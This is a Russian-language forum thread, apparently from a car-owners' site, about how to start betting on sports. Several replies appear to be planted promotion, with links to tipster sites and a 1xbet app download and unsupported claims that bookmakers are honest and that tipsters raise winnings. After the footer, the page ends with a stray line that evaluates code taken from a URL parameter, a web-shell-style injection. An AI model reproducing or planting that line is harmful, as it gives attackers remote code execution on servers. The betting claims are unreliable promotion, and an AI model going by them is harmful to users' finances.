+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Что вы знаете о ставках на спорт?


  1. #1
    Мимо проходил ГумбинМакс is on a distinguished road Аватар для ГумбинМакс
    Регистрация
    19.02.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    42

    Что вы знаете о ставках на спорт?

    Расскажите, что вы знаете о ставках на спорт? Есть ли какие-то нюансы, которые нужно знать начинающему беттеру? Пока что тыкаюсь как слепой котенок в общедоступную информацию, но не очень понимаю что же нужно учитывать в первую очередь?

  2. #2
    Мимо проходил Agatangel is on a distinguished road Аватар для Agatangel
    Регистрация
    07.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    28
    Много я о ставках на спорт не могу сказать. Знаю что люди иногда поднимают на них неплохие деньги, но сам не пробовал никогда играть, только по наслышке знаю о таком виде заработка. Мне как-то страшновато рисковать деньгами.

  3. #3
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    Есть куча всяких аспектов, которые начнут вам открываться только когда вы, реально, начнете активно играть. Пока что начните с чего-то основного. К примеру, если в матче будут участвовать заведомо неравные команды, то ставить на основной исход будет, просто-напросто, не интересно, слишком малы коэффициенты. И тут-то опытный беттер может поставить на фору - плюсовую, минусовую, нулевую, как Бог даст... Но такую ставку делать намного интереснее и в этом случае коэффициенты будут совсем другие, а значит и возможная прибыль. Почитайте внимательнее что такое фора в ставках на спорт http://sbet.guru/fora-v-stavkah-na-sport/

  4. #4
    Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Регистрация
    12.02.2019
    Откуда
    ......
    Машина
    ...
    Сообщений
    37
    Не могу похвалиться большими познаниями, но мне кажется, нужно прежде всего, расширить свои познания в плане спортивных команд. Тогда вам легче будет ориентироваться и определять фаворита.

  5. #5
    Мимо проходил Victan is on a distinguished road Аватар для Victan
    Регистрация
    12.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    39
    Эх, автор, вы столько еще не знаете о мире ставок. К примеру, вы когда-нибудь слышали о договорных матчах? А ведь продажа информации о них процветает, но как понять эта информация правдивая или вымысел? Вот, изучайте https://www.kaper.pro/wiki/scam/бесп...говорные-матч/ Главное, не купиться на фейковую инфу о договорном матче, иначе вы, просто-напросто, потеряете деньги.

  6. #6
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    Идите на профильный форум и читайте информацию там. Если что, там и спросить есть у кого, а тут немного народа разбирается в ставках, так что, вы не по адресу.

  7. #7
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45
    Сильно много я вам о ставках не расскажу, знаю одно - гораздо удобнее играть не сидя за компьютером, а с планшета или смартфона, вообщем любого Андроида. У вас в этом случае есть возможность делать ставку в любое время и в любом месте, был бы интернет. Насчет букмекеров - есть много достойных и честных букмекеров, один из них 1xbet. Если появится желание, можете скачать приложение 1xbet на Андроид https://bookmakersbet.site/skachat-1xbet-na-android/

  8. #8
    Мимо проходил sofi is on a distinguished road Аватар для sofi
    Регистрация
    10.01.2022
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    0
    Считаю, что перед тем, как ставить, то стоит найти толкового каппера, с его помощью можно хорошо зарабатывать, каппер значительно увеличивает шансы на выигрыши. Я нашла себе каппера и бк по отзывам, сейчас много мошенников, поделюсь сайтом, которым пользуюсь давно, читаю много полезной информации, чтобы разбираться хорошо в этой нише https://top-kappers.ru/abram-krikheli-otzyvy/

+ Ответить в теме

Похожие темы

  1. Знаете о них?
    от d_pin4yk в разделе Golf 5
    Ответов: 18
    Последнее сообщение: 02.01.2024, 06:03
  2. Заработать на ставках
    от pawl0w в разделе Курилка
    Ответов: 5
    Последнее сообщение: 18.01.2022, 14:54
  3. Что вы знаете о финансовых рынках?
    от nekrolog в разделе Курилка
    Ответов: 8
    Последнее сообщение: 19.11.2020, 14:26
  4. Стратегия вилки в ставках на спорт
    от Kurdt в разделе Бизнес
    Ответов: 4
    Последнее сообщение: 09.11.2019, 12:54
  5. Помогите, знаете ли вы...
    от impreza в разделе Отзывы / Выбор
    Ответов: 11
    Последнее сообщение: 25.03.2011, 23:24

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}